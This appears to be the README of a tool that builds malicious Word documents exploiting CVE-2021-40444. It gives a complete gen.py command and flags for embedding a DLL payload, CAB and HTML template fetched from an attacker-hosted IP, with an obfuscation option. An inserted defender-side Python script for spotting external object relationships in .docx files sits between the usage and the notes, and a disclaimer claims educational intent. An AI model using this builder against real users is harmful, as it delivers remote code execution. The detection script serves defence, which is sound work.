CVE-2021-40444

Usage

Run setup.sh first, as you will need a few directories. Once you have run the script, you should be able to run gen.py with the example given:

```
# Usage
python3 gen.py -d document/Sample.docx -p payload/payload.dll -i "http://10.10.10.10" -t html/template.html -c payload.cab -f nothing.inf -r Sample2.docx -obf 3

# Flags
-d -> Our .docx file that has already been modified with a Bitmap Object, whether in the header, document or footer
-i -> IP Address
-p -> Payload (.dll)
-t -> HTML file with JavaScript
-r -> Rename the output of the modified .docx
-c -> Rename the output of the patched .cab
-f -> Rename the output of the .inf
-obf -> Extra: comes with 3 modes (HTML Entity, UTF-16BE or Both)
-v -> Increase output verbosity
```
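
A defender-side check for documents like the one the `-d` flag describes, added here as an example and not part of this repository: it lists every relationship in a .docx's header, document and footer relationship parts that points outside the file. It assumes the address passed with `-i` ends up as an external relationship target; the function names and the sample document are constructed for the illustration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

def external_targets(docx_bytes):
    """Return (part, rel_kind, target) for each External relationship found
    in the parts under word/_rels/ (document, headers, footers)."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in sorted(z.namelist()):
            if not (name.startswith("word/_rels/") and name.endswith(".rels")):
                continue
            data = z.read(name)
            if b"<!DOCTYPE" in data:  # package parts must not carry a DTD
                raise ValueError(f"DTD found in {name}, refusing to parse")
            for rel in ET.fromstring(data).iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") == "External":
                    kind = rel.get("Type", "").rsplit("/", 1)[-1]
                    findings.append((name, kind, rel.get("Target", "")))
    return findings

def suspicious(findings):
    """Assumption for this example: only hyperlinks are expected to be external."""
    return [f for f in findings if f[1] != "hyperlink"]

def build_sample():
    """Constructed sample: a zip holding only the two relationship parts."""
    def rels(*items):
        body = "".join(f'<Relationship Id="rId{i}" Type="{BASE}{t}" Target="{tg}"{m}/>'
                       for i, (t, tg, m) in enumerate(items, 1))
        return f'<Relationships xmlns="{REL_NS[1:-1]}">{body}</Relationships>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/_rels/document.xml.rels", rels(
            ("hyperlink", "https://example.com/", ' TargetMode="External"'),
            ("image", "media/image1.png", "")))
        z.writestr("word/_rels/header1.xml.rels", rels(
            ("oleObject", "http://192.0.2.10/constructed.html", ' TargetMode="External"')))
    return buf.getvalue()

if __name__ == "__main__":
    for part, kind, target in suspicious(external_targets(build_sample())):
        print(f"{part}: external {kind} -> {target}")
```
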

Notes

  1. The http.server will be located in the web directory. This directory will have 3 files:
  • .cab
  • .html
  • .docx

Without Verbose

[Screenshot: without_verbose]

With Verbose

[Screenshot: with_verbose]

Disclaimer

This repository is for educational purposes only and is not intended to be used in the wild with bad intentions. Any illegal use of this repo is strictly at your own responsibility and risk.
